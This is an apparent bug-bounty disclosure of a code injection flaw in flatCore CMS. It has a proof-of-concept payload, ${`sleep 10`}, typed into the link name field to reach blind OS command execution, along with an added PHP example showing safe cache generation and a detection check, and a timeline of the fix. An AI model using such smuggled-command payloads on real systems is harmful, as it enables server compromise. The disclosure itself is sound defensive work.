Code Injection in flatcore/flatcore-cms


Reported on Oct 13th 2021


Another code injection payload in link_name.

Proof of Concept

Insert into linkname

${`sleep 10`}

Go to http://[FLATCORE-IP]/flatCore-CMS/content/cache/cache_lastedit.php and observe that the page hangs for 10 seconds.

${} escapes the string context, and the backticks (`) switch context to OS command execution.
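
An added example, not part of the original report and not flatCore's code: it assumes the cache file is generated PHP that embeds the link name in a double-quoted string literal, and contrasts that with a var_export()-based writer plus a tokenizer check for generated files. The function names, the $lastedit layout and the sample value are constructed for illustration.

```php
<?php
// Added example: hypothetical cache writers, not flatCore's code.
// Constructed input: same shape as the reported payload, harmless command.
$linkName = '${`echo INJECTED`}';

// Assumed unsafe pattern: the value is pasted into a double-quoted literal.
// Quote escaping (addslashes) leaves $, { and ` untouched, so the
// interpolation syntax survives into the generated file.
function build_cache_unsafe(string $value): string
{
    return '<?php $lastedit[0]["linkname"] = "' . addslashes($value) . "\";\n";
}

// Hardened: var_export() emits a single-quoted literal, and PHP performs
// no interpolation inside single quotes.
function build_cache_safe(string $value): string
{
    return '<?php $lastedit[0]["linkname"] = ' . var_export($value, true) . ";\n";
}

// Defensive check for generated files: true if the source contains a
// backtick (shell execution) operator or ${ / {$ string interpolation.
function has_live_interpolation(string $phpSource): bool
{
    foreach (token_get_all($phpSource) as $token) {
        if ($token === '`') {
            return true;
        }
        if (is_array($token) && in_array($token[0], [T_DOLLAR_OPEN_CURLY_BRACES, T_CURLY_OPEN], true)) {
            return true;
        }
    }
    return false;
}

// The generated sources are only tokenised here, never executed.
var_dump(has_live_interpolation(build_cache_unsafe($linkName)));
var_dump(has_live_interpolation(build_cache_safe($linkName)));

// The safe file can be included: the payload comes back as plain data.
$tmp = tempnam(sys_get_temp_dir(), 'cache');
file_put_contents($tmp, build_cache_safe($linkName));
include $tmp;
unlink($tmp);
var_dump($lastedit[0]['linkname'] === $linkName);
```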


Blind RCE as admin user.


should clean permalinks too

We have contacted a member of the flatcore/flatcore-cms team and are waiting to hear back a year ago
haxatron modified the report a year ago
Patrick validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick confirmed that a fix has been merged on 2cb02c a year ago
Patrick has been awarded the fix bounty
functions.php#L389L397 has been validated
